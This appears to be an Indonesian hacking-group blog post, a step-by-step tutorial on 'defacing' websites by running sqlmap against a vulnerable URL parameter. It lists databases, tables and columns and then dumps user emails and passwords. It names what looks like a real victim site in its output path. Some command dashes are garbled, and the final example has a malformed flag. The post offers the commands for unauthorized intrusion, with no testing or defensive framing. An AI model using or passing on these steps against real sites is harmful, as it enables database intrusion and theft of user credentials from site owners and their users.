Halaman

Tutorial deface dengan SQLMAP Lengkap + Gambar

Rabu, 13 April 2016

Tutorial deface dengan SQLMAP Terbaru - Oke, pada kesempatan kali ini saya akan berbagi tutorial SqlMap, sebenernya Sqlmap ini udah lama banget ya dari 2012 kurang tapi baru sekarang nih ane berbagi tutorialnya wkwk..

Sqlmap adalah bisa dibilang trobosan terbaru dari teknik sql injection secara manual. Di sqlmap ini melakukan injeksi secara otomatis ke db. Arti otomatis disini iyalah kita tidak usah capek capek menambah nambah anu di url. 

Sebenernya kita juga bisa menggunakan haavij juga untuk menginjeksi db, Oke langsung saja tanpa basa basi cek this shit : 

Hal yang pertama kali harus dilakukan iyalah kamu harus mendownload phyton & sqlmapnya. 
Link download phyton : www.python .org/downloads/ 
Link download sqlmap : www.sqlmap .org
(Download sesuai dengan OS dan bit kamu )

A. Kalo sudah download, tinggal install aja v 2.7 / v 2.6 
B. Masukkan sqlmap yang sudah didownload ke folder SQL
Setelah di ekstrak ganti nama dengan sqlmap ( biar mudah nntinya ).
Pindahkan folder sqlmap tadi kedalam folder instalasi phyton

C. CARA MENGGUNAKAN SQLMAP

1. Buka CMD dan buka folder sqlmap tadi contoh saya naruhnya di program files/�. : jadi perintahnya cd c:/program files (x86)/SQL/sqlmap


2. Masukkan perintah sqlmap.py �u link web vuln �dbs , contohnya : sqlmap.py �u www.target.com/root.php?id=89 --dbs

3. Tunggu prosesnya, Jika muncul notif seperti ini , ketik y lalu enter


4. Jika muncul seperti ini , ketik y lalu enter ( lagi :v )


5. Tunggu proses selesai dan akan muncul nama databasenya


6. Setelah mendapat nama database , selanjutnya adalah mencari nama table
Perintahnya : sqlmap.py �u link web vuln �D nama database --tables
Contoh : sqlmap.py �u www.target.com/root.php?id=89 �D roet �tables


7. Setelah mendapat nama table seperti ini , langsung kita pilih salah satu table kemudian get column ,
perintahnya : sqlmap.py �u link web vuln �D nama database �T nama table --columns
contohnya : sqlmap.py �u www.target.com/root.php?id=89 �D roet �T users --columns

8. Setelah mendapat columns , saatnya dump ( ngambil ) datanya
perintahnya : sqlmap.py �u link web vuln �D nama database �T nama table -C namacolumns �dump
contohnya : sqlmap.py �u www.target.com/root.php?id=89 �D roet �T users �C email,password �dbs sssss
DATA yang sudah didump tadi bias dilihat di c:/users/namausers/.sqlmap/output/namaweb/dump/namadb/ Contoh :
C:\Users\efbe\.sqlmap\output\www.ashtondundee.co.uk\dump\ashtondu_uberguest


Sudah selesai dehh, gimana ? gampang kan ? *susah omm 
namanya juga belajar ya gak ada yang secepat kilat. btw sekian tutorial yang engga bermanfaat ini, Terimakaseh,


3xploi7 Team






Tidak ada komentar:

Posting Komentar